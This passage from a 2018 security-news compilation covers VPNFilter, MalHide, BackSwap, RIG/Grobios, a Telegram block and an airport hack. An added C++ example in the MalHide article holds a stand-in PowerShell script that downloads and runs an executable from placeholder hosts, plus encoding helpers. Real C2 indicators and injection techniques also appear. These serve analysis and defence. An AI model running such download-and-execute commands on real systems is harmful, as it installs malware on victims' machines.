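// room instead. Correct for any integer width.
bool safe_segment_fits(uint64_t offset, uint64_t count, uint64_t table_size) {
    return offset <= table_size && count <= table_size - offset;
}

// Apply the segment only after the safe check; a segment that does not fit
// rejects the module instead of writing past the table. Returns entries written.
size_t apply_element_segment(std::vector<uint64_t>& table, uint32_t offset,
                             const std::vector<uint64_t>& segment) {
    if (!safe_segment_fits(offset, segment.size(), table.size())) {
        throw std::out_of_range("element segment does not fit in table");
    }
    for (size_t i = 0; i < segment.size(); ++i) {
        table[offset + i] = segment[i];  // in bounds: offset + i < table.size()
    }
    return segment.size();
}

int main() {
    std::vector<uint64_t> table(16, 0);
    std::vector<uint64_t> segment{1, 2, 3};
    apply_element_segment(table, 4, segment);  // fits: entries 4..6 are written
    try {
        apply_element_segment(table, kCrashOffset, segment);  // rejected, no write
    } catch (const std::out_of_range&) {
    }
    return 0;
}
```

The subtraction form is the one to use in any loader that copies module-controlled segments (data or element) into a runtime buffer: it is correct at every integer width, while the addition form silently accepts the same malicious offset as soon as size_t is 32 bits wide.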


Russia Asks Apple to Help Block Telegram
28.5.2018 securityweek BigBrothers 

Russia's communications watchdog said Monday it had requested Apple help it block the popular messaging app Telegram which has been banned in the country for refusing to give the security services access to private conversations.

Roskomnadzor said it had asked Apple both to block push notifications for Telegram users in Russia, which would mean users would not receive alerts for new messages and thus make the app less useful, and to stop making it available for download in the country.

"In order to avoid possible action by Roskomnadzor for violations of the functioning of the above-mentioned Apple Inc. service, we ask you to inform us as soon as possible about your company's further actions to resolve the problematic issue," said the regulator.

Roskomnadzor's director Alexander Zharov later told the Russian news agency Interfax that Apple had one month to reply and declined to speculate about what actions it could possibly take against the US firm if it refused to comply.

Last month a Moscow court banned the popular app following a long-running battle between authorities and Telegram, which has a reputation for securely encrypted communications, as Moscow pushes to increase surveillance of internet activities.

The app was created by maverick Russian programmer Pavel Durov, who has long said he will reject any attempt by the country's security services to gain backdoor access to the app.

The free app that lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Following the court ruling Roskomnadzor has moved to block the functioning of Telegram, but has acknowledged it has only succeeded in disrupting its operations by 15 to 30 percent.

It has also ended up disrupting other services, with Zharov last week accusing Telegram of using other online services as "human shields" by using their servers.

Zharov was also quoted by Russian news agencies as saying the ban against Telegram was justified as it had been used in the planning of all the latest terror attacks around the world.

Roskomnadzor told the TASS state news agency on Monday that discussions were still underway with Google about implementing the ban.


FBI Attribution of 'VPNFilter' Attack Raises Questions
28.5.2018 securityweek Virus

Information shared by the FBI on the massive VPNFilter attack in which more than half a million devices have been compromised raises some interesting questions about the connection between Russia-linked hacker groups.

The existence of VPNFilter was brought to light last week by Cisco Talos and several other cybersecurity firms. The botnet is powered by at least 500,000 hacked routers and network-attached storage (NAS) devices across 54 countries.

The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.

Many of the hijacked devices are located in Ukraine and a separate command and control (C&C) infrastructure has been set up for devices in that country. Researchers also spotted code similarities to the BlackEnergy malware and pointed out that there are only a few weeks until Ukraine celebrates its Constitution Day, which last year coincided with the destructive NotPetya attack. All this has led experts to believe that VPNFilter may mean Russia is preparing a new attack on Ukraine.

Shortly after security firms published technical details on the attack, the U.S. Department of Justice announced that the FBI had seized toknowall.com, one of the C&C domains utilized by VPNFilter.

A press release and court documents name the Russia-linked threat actor Sofacy as being behind the attack. While this is not surprising, one noteworthy piece of information is that U.S. authorities say Sofacy is also known as APT28, Pawn Storm, Fancy Bear, Sednit, X-Agent, and Sandworm.

Sandworm, also tracked by some security companies as TeleBots, is a threat actor known to use the BlackEnergy malware in attacks aimed at industrial systems and it’s believed to be responsible for the 2015 power outage in Ukraine. However, Sandworm was until now seen as a separate group from Sofacy.

SecurityWeek has reached out to the Justice Department and the FBI for clarifications, but the organizations say they “do not have a comment outside what is included in the DOJ press release.”

Industry professionals, however, have offered some possible explanations as to why the FBI may see Sofacy and Sandworm as the same group.

“Sandworm is a similar team whose interests overlap with APT 28. We believe these actors are related and act accordingly,” Craig Williams, director of outreach with Cisco Talos, told SecurityWeek.

Vikram Thakur, principal research manager at Symantec Security Response, noted, “The intelligence community has the best shot at attributing attacks to individuals and organizations. Every security vendor groups attackers based on their own vantage into the attack landscape.

“Keeping in mind that attack groups themselves share knowledge, expertise, and resources, we don’t have any reason to question the grouping of Sofacy, Sandworm, X-Agent, and others that the FBI listed in their affidavit to seize a domain related to VPNFilter.”

Researchers at Kaspersky also found it curious that the FBI suggested Sandworm and Sofacy were one and the same.

“This would suggest that Sandworm, also known as BlackEnergy APT, is regarded as subgroup of Sofacy by the FBI,” Kaspersky researchers said. “Most threat intel companies have held these groups separate before, although their activity is known to have overlapped in several cases.”

Advice from the FBI and targeted device vendors

Rebooting a router is typically enough to remove a piece of malware from the device. However, VPNFilter has some clever persistence mechanisms that help its stage 1 component survive a reboot.

An alert issued on Friday by the FBI advises owners of small office and home office routers to reboot their devices to “temporarily disrupt the malware and aid the potential identification of infected devices.”

“Owners are advised to consider disabling remote management settings on devices and secure with strong passwords and encryption when enabled. Network devices should be upgraded to the latest available versions of firmware,” the FBI said.

The VPNFilter malware has been observed targeting devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. All of these vendors have published advisories to warn their customers about the threat.

There is no evidence that the malware exploits any zero-day vulnerabilities to hack devices. Affected vendors noted that the flaws targeted by VPNFilter have already been patched and advised customers to update the firmware on their devices.


Researchers And The FBI Work Together to Take Down the Russian VPNFilter Botnet Targeting Home Routers
28.5.2018 securityaffairs Virus

Researchers and the FBI are working together to take down the dreaded VPNFilter botnet composed of hundreds of thousands of compromised devices.
For several months, there have been rumors and vague warnings about highly skilled adversaries targeting critical infrastructure. Last week we learned some details about the warning, why you might be impacted and how the FBI is helping victims recover.
On May 23rd, Cisco’s security research arm Talos, released details about a “sophisticated modular malware system” they call VPNFilter.

The malware has infected over 500,000 routers manufactured by Linksys, MikroTik, NETGEAR and TP-Link as well as QNAP network storage devices. It appears the malware was targeted at victims in Ukraine, but the ubiquity of the Internet often means such attacks spread to a wider group of victims, and infections have been found in at least 54 countries.

Following the Talos release, the FBI announced it had seized control of a Command & Control (C&C) domain used by the botnet, effectively neutering it.

We have seen similar compromises of small to medium business (SMB) equipment in the past (Mirai) where known vulnerabilities were exploited to gain control of Internet of Things (IoT) devices accessible from the Internet.

Researchers have yet to determine the specific method of compromise in this case, but knowing this equipment is often poorly maintained in homes and small business there is a strong likelihood that they were vulnerable to a range of exploits. Despite some similarities to previous IoT attacks, VPNFilter has some unique capabilities that show how this type of malware is evolving.

IoT devices have limited computing resources so malware is normally “memory resident” meaning you can remove the infection simply by rebooting your device. VPNFilter is successful at persisting the first stage of its infection through reboots.

This means that upon reboot, the malware can connect to the C&C server and download the configured modules to reinfect the device. At the time of the announcement several different modules had been identified which could have devastating implications for impacted businesses.

From the Talos report, “The stage 2 malware, which does not persist through a reboot, possesses capabilities that we have come to expect in a workhorse intelligence-collection platform, such as file collection, command execution, data exfiltration and device management.”

In addition, it appears the bad actors had the ability to brick the devices remotely, rendering them useless and denying Internet access to the companies and homes relying on them. They also identified packet sniffing capabilities which would identify usernames and passwords — which is pretty common — but also decoding Modbus SCADA traffic which is used by companies to remotely control equipment in manufacturing, pipelines, and energy.

Based upon the apparent Ukraine focus and the targeting of SCADA protocols, The Daily Beast reports VPNFilter is “linked to the same Russian hacking group, known as Fancy Bear, that breached the Democratic National Committee and the Hillary Clinton campaign during the 2016 election.”

What can you do?

Since the FBI is in control of the C&C domain, rebooting your equipment should remove the malicious modules, but the Stage 1 infection will still be resident. If you have equipment from the identified manufacturers, you should perform a factory reset.

This will remove all of the bad code, but unfortunately also removes all of your settings — so it is impactful. Researchers are still uncovering the extent of the compromise, so it isn’t a bad idea to reboot your edge devices even if they come from a different manufacturer in the SMB space.

Additional advice is the good practice everyone should be following regardless of who manufactured your equipment: change default passwords, disable remote administration from the Internet and install any available updates from your manufacturer.


Hackers defaced screens at Mashhad airport in Iran protesting the government
28.5.2018 securityaffairs Hacking

On Thursday 24th May, hackers defaced the screens at the Mashhad airport in Iran to protest against the government and the military's activities in the Middle East.
On Thursday 24th May, hackers defaced the screens at the airport in the city of Mashhad, Iran. The anonymous group replaced the content of the arrival and departure screens with anti-government messages that also protested against the military's activities in the Middle East.

“Social media reports from Mashhad posted pictures of defaced arrival and departure monitors at the city’s airport showing a statement protesting against Iran’s military presence in the Middle East.” reads a blog post published by Radio Farda.

“Hackers protested to “wasting Iranians lives and financial resources in Gaza, Lebanon and Syria by the Islamic Revolution Guards Corps (IRGC),” according to a statement on the boards.”

The messages were in the Persian language, the hackers accuse the Iranian government of wasting Iranian lives and resources in Lebanon, Syria, and Gaza.

“Wasting Iranians lives and financial resources in Gaza, Lebanon, and Syria by the Islamic Revolution Guards Corps (IRGC),” said the deface message appeared on the screens at the airport.


According to Radio Farda, a group named Tapandegan (Palpitaters) expressed support for the people of the city of Kazeroon in Fars Province that have been demonstrating against the government for months.

The group of hackers also took control of the email account of the Mashhad airport civil aviation head, Mohsen Eidizadeh and used it to spread the news of the hack.

The hackers also asked people at the airport to share pictures of defaced screens and post them on social media platforms using the hashtag “#Protests_alloverthecountry, #اعتراضات_سراسری” as result, hundreds of Iranians posted the images on Twitter.

M. Hanif Jazayeri (@HanifJazayeri) wrote on Twitter on May 25, 2018: “Hackers take control of monitors at Iran's Mashhad Airport displaying signs in support of #IranProtests. The signs read "How much longer?" and carry the Farsi hashtag calling for nationwide protests. #اعتراضات_سراسری #FreeIran2018 #IranRegimeChange (May 24, 2018)”
Since December 2017, the city of Mashhad has been the scene of heated protests against the government and the unsustainable prices in the country.

The massive anti-government demonstrations later spread to over 100 other Iranian cities.


MalHide Malware uses the compromised system as an eMail relay
28.5.2018 securityaffairs Virus

The cybersecurity expert Marco Ramilli analyzed a new malware sample, dubbed MalHide, that implements a fairly new attack path: it uses the compromised system as an email relay in order to hide the attacker's network.
Today I'd like to share an interesting (at least to me) analysis of a given sample. I have called this sample MalHide, but you will see why only at the end of my post :D. I believe this is quite an interesting malware because, first, it implements several obfuscation stages using different obfuscation techniques and, second, it implements a fairly new attack path (not new per se, but new for opportunistic malware families) in which the attacker does not want to steal information or compromise a system for possession or destruction, but uses the compromised system as an email relay in order to hide the attacker's network. It is remarkable to see that attackers are primarily moving in the direction of fraud. For example, having obtained privileged access on the victim machine, the attacker might decide to perform many malicious actions, but among all the choices he decides to spawn an SMTP relay to send fraudulent emails anonymously. Based on my past experience this is quite weird, isn't it?!
Disclaimer: I'm not going into the details of every step, since I'm not writing a tutorial; mostly I'd like to show that threats are getting more and more complex in a relatively short time and that this attack path is quite unique, at least in my personal experience.
Everything started with an email attachment named “Nuovo Documento.doc”, which was able to bypass every single anti-spam and anti-malware engine the target had. The following image shows the initial stage, where the .DOC file seems benign but not compatible with the running Microsoft Word instance.

MalHide Sample as it looks like on opening.
The sample contains some macro functions. Many junk functions have been injected on the VBA side to make life harder for reverse engineers, but fortunately the Microsoft VBA Editor included in the Microsoft Office suite implements a useful debugger. The analyst observes that the AutoOpen() function is preserved and filled with code. It took almost 3 seconds to figure out it was malicious code. The following image shows the Microsoft VBA Editor debugging view, where it is possible to see the variable qZbTUw containing PowerShell encoded code. Here we are! The second stage is approaching the victim.

Stage 2. A running instance of PowerShell invoked by VBA
The PowerShell code was Base64 encoded and additionally obfuscated through “variable mess”. This technique is quite common among JavaScript developers, since the code they write runs on the client side and obfuscation is a technique used to protect (sort of) that code; in this scenario, however, it looks like a simple implementation of fileless staging, where the attacker runs a PowerShell script directly from memory without saving it to disk. That way the victim does not need to have the Microsoft registry setting that allows running PowerShell from a file enabled, and it is much harder for an antivirus to detect the infection stage. The script then carries on the infection. PowerShell ISE helps us reverse the dropped payload. The following images show the decoding process, from the single line of obfuscated code to the dropping URLs. I know it is almost impossible to see the images since they look small, but please click on them for a bigger view if you wish.

Stage 3. Decoding Powershell Drop-and-Execute

Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to the IoC section)! The executed actions are quite standard: from an array of dropping websites, cycle over them and take the one that drops. The cycling policy could differ from sample to sample, since they could use a pseudo-random seed generator, an increment rotation, a round-robin rotation and so on. For this analysis the cycling policy is not interesting at all, since we decoded all the possible dropping files. The PowerShell command gets 52887.exe from an external source (the dropping websites), places it at C:\Users\Public\52887.exe and finally runs it. Stage 4 has begun: a new PE sample has been executed. The following image shows Stage 4 dropping another stage into C:\Windows\SysWOW64\fonduewwa.exe. Fortunately, this stage drops the code from itself without going to the network. fonduewwa.exe is then executed.

Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe
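The stage-2 PowerShell described above is Base64-encoded, and the detail that trips up triage is what sits inside the Base64: when a macro hands a script to PowerShell via -EncodedCommand (my assumption about how this sample is launched; the page only says the code is "PowerShell encoded"), the script is encoded as UTF-16LE text, so a plain Base64 decode shows every character followed by a NUL byte. The following C++ is an added example written for this page, not Marco Ramilli's code and not the real MalHide script: it implements that encoding chain in both directions and a small helper that pulls the dropper URLs out of the decoded script. The script body, the dropper domains (dropper-one.example, dropper-two.example) and the "try each URL until one answers" loop are constructed stand-ins; only the drop path C:\Users\Public\52887.exe comes from the analysis.

```cpp
// Added example for this page (not Marco Ramilli's code, not the real MalHide
// script): the encoding chain behind a "PowerShell encoded" stage, i.e. the
// UTF-16LE text that PowerShell's -EncodedCommand expects, wrapped in Base64,
// and a triage helper that decodes it and pulls out the drop URLs.
#include <cstdint>
#include <cstring>
#include <stdexcept>
#include <string>
#include <vector>

static const char kB64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

std::string b64_encode(const std::vector<uint8_t>& in) {
    std::string out;
    size_t i = 0;
    for (; i + 2 < in.size(); i += 3) {
        uint32_t v = (uint32_t(in[i]) << 16) | (uint32_t(in[i + 1]) << 8) | in[i + 2];
        for (int s = 18; s >= 0; s -= 6) out += kB64[(v >> s) & 63];
    }
    if (i < in.size()) {  // 1 or 2 trailing bytes, padded with '='
        uint32_t v = uint32_t(in[i]) << 16;
        if (i + 1 < in.size()) v |= uint32_t(in[i + 1]) << 8;
        out += kB64[(v >> 18) & 63];
        out += kB64[(v >> 12) & 63];
        out += (i + 1 < in.size()) ? kB64[(v >> 6) & 63] : '=';
        out += '=';
    }
    return out;
}

std::vector<uint8_t> b64_decode(const std::string& in) {
    std::vector<uint8_t> out;
    uint32_t acc = 0;
    int bits = 0;
    for (char c : in) {
        if (c == '=' || c == '\r' || c == '\n' || c == ' ') continue;
        const char* p = c ? std::strchr(kB64, c) : nullptr;
        if (!p) throw std::runtime_error("not Base64");
        acc = (acc << 6) | uint32_t(p - kB64);
        bits += 6;
        if (bits >= 8) { bits -= 8; out.push_back(uint8_t(acc >> bits)); }
    }
    return out;
}

// -EncodedCommand takes Base64 of the script as UTF-16LE: every ASCII character
// is followed by a NUL, which is why a plain Base64 decode looks like garbage.
std::vector<uint8_t> to_utf16le(const std::string& s) {
    std::vector<uint8_t> b;
    for (unsigned char c : s) { b.push_back(c); b.push_back(0); }
    return b;
}
std::string from_utf16le(const std::vector<uint8_t>& b) {
    if (b.size() % 2) throw std::runtime_error("odd length, not UTF-16LE");
    std::string s;
    for (size_t i = 0; i < b.size(); i += 2) {
        uint16_t u = uint16_t(b[i] | (b[i + 1] << 8));
        s += (u < 0x80) ? char(u) : '?';  // non-ASCII is irrelevant for URL triage
    }
    return s;
}
std::string encode_command(const std::string& script) { return b64_encode(to_utf16le(script)); }
std::string decode_command(const std::string& b64) { return from_utf16le(b64_decode(b64)); }

// Pull http(s) URLs out of a decoded script; a quote, space or separator ends one.
std::vector<std::string> extract_urls(const std::string& script) {
    std::vector<std::string> urls;
    const std::string stop = "'\" ,;)\r\n\t";
    for (size_t pos = script.find("http"); pos != std::string::npos; pos = script.find("http", pos + 1)) {
        if (script.compare(pos, 7, "http://") != 0 && script.compare(pos, 8, "https://") != 0) continue;
        size_t end = script.find_first_of(stop, pos);
        urls.push_back(script.substr(pos, end == std::string::npos ? std::string::npos : end - pos));
    }
    return urls;
}

// Constructed stand-in for the stage-2 script: cycle over dropper URLs, save the
// first one that answers as C:\Users\Public\52887.exe, run it. The domains are
// invented; the real drop sites are in the original analysis' IoC section.
const std::string kSampleScript =
    "$u='http://dropper-one.example/52887.exe','https://dropper-two.example/x/52887.exe';"
    "foreach($s in $u){try{(New-Object Net.WebClient).DownloadFile($s,'C:\\Users\\Public\\52887.exe');"
    "Start-Process 'C:\\Users\\Public\\52887.exe';break}catch{}}";

int main() {
    std::string encoded = encode_command(kSampleScript);  // what a macro hands to powershell -enc
    std::vector<std::string> urls = extract_urls(decode_command(encoded));
    return urls.size() == 2 ? 0 : 1;
}
```

The decoder deliberately does not try to undo the "variable mess" layer, which differs per sample; once the script is readable, the URL extraction is what feeds blocklists, and the round trip through encode_command is a quick way to confirm a suspicious Base64 blob really is a UTF-16LE script rather than a binary payload.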
The new stage (Stage 4) performs the following steps:
1) It starts services which act as an SMTP client.
2) It connects to a Command and Control server, which provides the email addresses, SMTP relays and email bodies to be sent.
3) It sends emails to carry out BEC communications.
The following images show the Command and Control address. The first image shows the Windows API used, while the second shows the connections opened directly on the infected machine.

Command and Control IP Address (click to make it bigger)

Command and Control DNS resolution (click to make it bigger)
The Command and Control (C2) listens at c-67-176-238-209.hsd1.il.comcast.net, which today resolves to 67.176.238.209. The C2 seems to answer HTTP queries that carry a specific set of cookies, as the following image shows. A crafted and rebuilt communication with the C2, made possible by reconstructing the cookies from sniffed internal communications, gets back about a kB of encoded data from the C2.

Command and Control Communication through HTTP
From the C2 come actions, victim addresses, SMTP servers and passwords. The sample connects to the given SMTP relays, authenticates itself and sends email to the victims. The following images prove that the attackers have plenty of credentials for SMTP relays around the globe.

MalHide Connection to real SMTP relays
For now I will not disclose the usernames and passwords for accessing the SMTP relays, but if you can prove to be the owner of one of them (or at least to be working for the company that owns it), let's have a chat about that: many interesting things are happening in your network. The emails sent from the analyzed sample target specific victims. It was pretty easy to figure out that we were facing a new attack vector! This attack vector looks like a BEC (or CEO scam) against specific targets. For those of you not familiar with this attack, I am copying the definition provided by SANS (here).
“Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization’s website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization’s structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT. Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization’s logo or even the official signature of an executive.
These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone.”
Below are a few examples of the emails coming from the C2 and delivered through the analyzed MalHide sample.

Here we are: another email has been sent, another malware has been conceived and developed, another analysis has been made, but this time it looks like the “malware economy” is seriously moving toward fraud; there is much more money in it than in information stealing, which is an ancient and romantic way to attack victims. Is this attack a significant example expressing the will of the new underground economy? Is this attack a small and silent change of paradigm, where previously the attacker was interested in your data in order to sell it, but now he is more interested in defrauding third parties (such as companies) through you? I do not have the answer.

OK, now it's time to explain why I called this malware MalHide. Well, it is a complex malware, it hides itself several times, BUT most importantly it has been developed to hide the attacker who sends the emails, in a way that makes it impossible to trace the attacker's IP back from the attack path. So I believe MalHide is a nice name 😀

Further details on the MalHide malware, including the IoCs are reported in the original analysis published by Marco Ramilli

https://marcoramilli.blogspot.it/2018/05/malhide-interesting-malware-sample.html


BackSwap Trojan implements new techniques to steal funds from your bank account
28.5.2018 securityaffairs Virus

Security experts at ESET have spotted a new strain of banking trojan named BackSwap Trojan that implements new techniques to steal money from bank customers.
The new techniques allow the malware to bypass anti-malware solutions and security features implemented by browsers to prevent Man-In-The-Browser attacks.

Banking malware usually injects malicious code into the web page by injecting itself into the browser process and hooking browser functions while the user accesses the bank account. Such injection mechanisms are used by the most popular banking malware, including Dridex, Ursnif, Zbot, Trickbot and Qbot.

Unfortunately for crooks, modern anti-malware products are able to detect process injection activity and neutralize it; for this reason, cybercriminals have been shifting to more profitable malware such as ransomware and cryptocurrency miners.

The BackSwap Trojan overcomes these obstacles with completely new techniques that do not tamper with the browser processes at all.

The first technique implemented by BackSwap allows the Trojan to detect when the user is accessing online banking services, the malicious code leverages a native Windows mechanism named the “message loop.”

“We have discovered a new banking malware family that uses an innovative technique to manipulate the browser: instead of using complex process injection methods to monitor browsing activity, the malware hooks key window message loop events in order to inspect values of the window objects for banking activity.” reads the analysis published by ESET.

“The malware monitors the URL currently being visited by installing event hooks for a specific range of relevant events available through the Windows message loop, such as EVENT_OBJECT_FOCUS, EVENT_OBJECT_SELECTION, EVENT_OBJECT_NAMECHANGE and a few others. The hook will look for URL patterns by searching the objects for strings starting with “https” retrieved by calling the get_accValue method from the event’s IAccessible interface.”

BackSwap simply taps into the Windows message loop searching for URL-like patterns, such as “https” strings and any other terms that are associated with bank’s website.

When the malware detects the browser is accessing the website of a bank it simulates key presses to perform the injection of the JavaScript appropriate for the corresponding bank.

“In older samples, the malware inserts the malicious script into the clipboard and simulates pressing the key combination for opening the developer’s console (CTRL+SHIFT+J in Google Chrome, CTRL+SHIFT+K in Mozilla Firefox) followed by CTRL+V, which pastes the content of the clipboard and then sends ENTER to execute the contents of the console. Finally, the malware sends the console key combination again to close the console. The browser window is also made invisible during this process – to regular users it might seem as if their browser simply froze for a moment.” reads the analysis published by ESET.

“In the newer variants of the malware, this approach has been upgraded – instead of interacting with the developer’s console, the malicious script is executed directly from the address bar, via JavaScript protocol URLs; a little-used feature supported by most browsers. The malware simply simulates pressing CTRL+L to select the address bar followed by the DELETE key to clear the field, then “types” in “javascript:” by calling SendMessageA in a loop, and then pastes the malicious script with the CTRL+V combination. It then executes the script by sending the ENTER key. At the end of the process, the address bar is cleared to remove any signs of compromise.”

Current versions of the BackSwap Trojan target the most popular browsers: Google Chrome, Mozilla Firefox and Internet Explorer.

The experts believe that many other malware will adopt the same technique in a short time, it is easy to implement and very effective.

ESET confirmed that current versions of the BackSwap Trojan include the scripts to interact with five Polish banks, PKO Bank Polski, Bank Zachodni WBK S.A., mBank, ING, and Pekao.


ESET said it notified browser vendors about BackSwap's new techniques in the hope that they will deploy countermeasures in upcoming browser versions and mitigate these types of attacks before they go mainstream with other malware families.


Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan
28.5.2018 securityaffairs Exploit

Malware researchers from FireEye recently noticed an interesting ongoing activity involving the infamous RIG Exploit Kit (EK) to deliver the Grobios Trojan.
Security experts highlighted several times the decline of the exploit kit activity after the disappearance of the Angler and Nuclear exploit kits in 2016.
Nevertheless, researchers at FireEye periodically observe significant developments in this space, and recently noticed an interesting ongoing activity involving the infamous RIG Exploit Kit (EK).

The RIG Exploit Kit has recently been involved in the distribution of the Grobios Trojan; the infection chain is shown in the following image.

RIG Exploit Kit Grobios campaign

“We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain, latorre[.]com[.]au, which had a malicious iframe injected to it.” reads the analysis published by FireEye.

“The iframe loads a malvertisement domain, which communicates over SSL and leads to the RIG EK landing page that loads the malicious Flash file”. “When opened, the Flash file drops the Grobios Trojan.”

Malware researchers said the Grobios Trojan implements several evasion techniques and uses various persistence mechanisms to make it hard for victims to uninstall the threat. The malware uses the following techniques to gain persistence:

It drops a copy of itself into the %APPDATA% folder (e.g. %APPDATA%\Google\v2.1.13554\<RandomName>.exe), masquerading as a version of a legitimate application installed on the target system, and creates an Autorun registry key and a shortcut in the Windows Startup folder.
It drops multiple copies of itself into subfolders of a program under %ProgramFiles% or %PROGRAMFILES(X86)%, masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
It drops a copy of itself into the %Temp% folder and creates a scheduled task to run it.
The malware also uses multiple anti-debugging, anti-analysis and anti-VM techniques to evade detection.

After completing a series of checks to detect VM and malware analysis environments, the Grobios Trojan connects to the command and control (C2) server to receive commands.

“In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx.” continues the analysis.

“The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of API functions it calls and parses the PE header of the DLL files to match the name of a function to its hash. The malware also uses stack strings.”

Once it has infected the system, the malware also creates two scheduled tasks.

Experts highlighted that the malware protects its copy in the %TEMP% folder with the Windows Encrypting File System (EFS).

The analysis of the code also revealed the presence of two hardcoded obfuscated C2s.

“Despite the decline in activity, exploit kits still continue to put users at risk – especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.” concluded FireEye.

Further details including the IoCs for the threat are available in the report.


VPNFilter EXIF to C2 mechanism analysed
27.5.2018 Kaspersky
Virus

On May 23 2018, our colleagues from Cisco Talos published their excellent analysis of VPNFilter, an IoT / router malware which exhibits some worrying characteristics.

Some of the things which stand out about VPNFilter are:

It has a redundant, multi-stage command and control mechanism which uses three different channels to receive information
It has a multi-stage architecture, in which some of the more complex functionality runs only in the memory of the infected devices
It contains a destructive payload which is capable of rendering the infected devices unbootable
It uses a broken (or incorrect) RC4 implementation which has been observed before with the BlackEnergy malware
Stage 2 command and control can be executed over TOR, meaning it will be hard to notice for someone checking the network traffic
We’ve decided to look a bit into the C&C mechanism for the persistent malware payload. As described in the Talos blog, this mechanism has several stages:

First, the malware tries to visit a number of gallery pages hosted on photobucket[.]com and fetches the first image from the page.
If this fails, the malware tries fetching an image file from a hardcoded domain, toknowall[.]com. This C2 domain is currently sinkholed by the FBI.
If that fails as well, the malware goes into a passive backdoor mode, in which it processes network traffic on the infected device waiting for the attacker’s commands.
For the first two scenarios, in which the malware successfully receives an image file, a C2 extraction subroutine is called which converts the image’s EXIF coordinates into an IPv4 address. This is used as an easy way to avoid DNS lookups to reach the C&C. Of course, if this fails, the malware will indeed look up the hardcoded domain (toknowall[.]com). It may be worth pointing out that in the past, the BlackEnergy APT developers have shown a preference for using IP addresses for C&C instead of hardcoded domain names, which can be easily sinkholed.

To analyse the EXIF processing mechanism, we looked into the sample 5f358afee76f2a74b1a3443c6012b27b, mentioned in the Talos blog. The sample is an i386 ELF binary and is about 280KB in size.

Unfortunately for researchers, it appears that the photobucket.com galleries used by the malware have been deleted, so the malware cannot use the first C2 mechanism anymore. For instance:

With these galleries unavailable, the malware tries to reach the hardcoded domain toknowall[.]com.
While looking at the pDNS history for this domain, we noticed that it resolved to an IP address in France, at OVH, between January and February 2018:

Interestingly, when visiting this website’s C2 URL, we are presented with a JPG image, suggesting it is still an active C2:

Here’s how it looks when viewed as an image:

When we look into the EXIF data for the picture, for instance using IrfanView, it looks as follows:

Filename – update.jpg
GPS information:
GPSLatitude – 97 30 -175 (97.451389)
GPSLongitude – -118 140 -22 (-115.672778)
How to get the IP out of these? The subroutine which calculates the C2 IP from the Latitude and Longitude can be found at offset 0x08049160 in the sample.

As it turns out, VPNFilter implements an actual EXIF parser to get the required information.

First, it searches for a binary value 0xE1. This makes sense because the EXIF attribute information begins with a tag “0xFF 0xE1”. Then, it verifies that the tag is followed by a string “Exif”. This is the exact data that should appear in a correct header of the Exif tag:

Exif tag
FF E1            Exif tag
xx               Length of field
45 78 69 66 00   'Exif'
00               Padding

The tag is followed by an additional header:

“Attribute information” header
49 49 (or 4D 4D)   Byte order, 'II' for little endian ('MM' for big endian)
2A 00              Fixed value
xx xx              Offset of the first IFD

The data following this header is supposed to be the actual “attribute information” that is organized in so-called IFDs (Image File Directory) that are data records of a specific format. Each IFD consists of the following data:

IFD record
xx xx         IFD tag
xx xx         Data type
xx xx xx xx   Number of data records of the same data type
xx xx xx xx   Offset of the actual data, from the beginning of the EXIF

The malware’s parser carefully traverses each record until it finds the one with the tag '25 88' (0x8825 little endian). This is the tag value for “GPS Info”. That IFD record is, in turn, a list of tagged IFD records that hold separate values for latitude, longitude, timestamp, speed, etc. In our case, the code is looking for the tags '2' (latitude) and '4' (longitude). The data for latitude and longitude are stored as three values in the “rational” format: two 32-bit values, the first being the numerator and the second the denominator. Each of these three values corresponds to degrees, minutes and seconds, respectively.

Then, for each record of interest, the code extracts the numerator part and produces a string of three integers (e.g. "97 30 4294967121" and "4294967178 140 4294967274", which a typical EXIF parser would display as 1193143 deg 55′ 21.00″ and 4296160226 deg 47′ 54.00″). Then, curiously enough, it uses sscanf() to convert these strings back to integers. This may indicate that the GPS Info parser was taken from a third-party source file and used as-is. The extracted integers are then used to produce an actual IP address. The pseudocode in C is as follows:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    const char lat[] = "97 30 4294967121";          // numerators from Exif GPSLatitude
    const char lon[] = "4294967178 140 4294967274"; // numerators from Exif GPSLongitude
    int o1p1, o1p2, o2p1, o3p1, o3p2, o4p1;
    uint8_t octets[4];

    // The out-of-range values are read as 32-bit two's complement (4294967121 -> -175),
    // which is what the EXIF viewer above shows as "97 30 -175" and "-118 140 -22".
    sscanf(lat, "%d %d %d", &o1p2, &o1p1, &o2p1);
    sscanf(lon, "%d %d %d", &o3p2, &o3p1, &o4p1);
    // Storing into uint8_t keeps only the low byte of each sum.
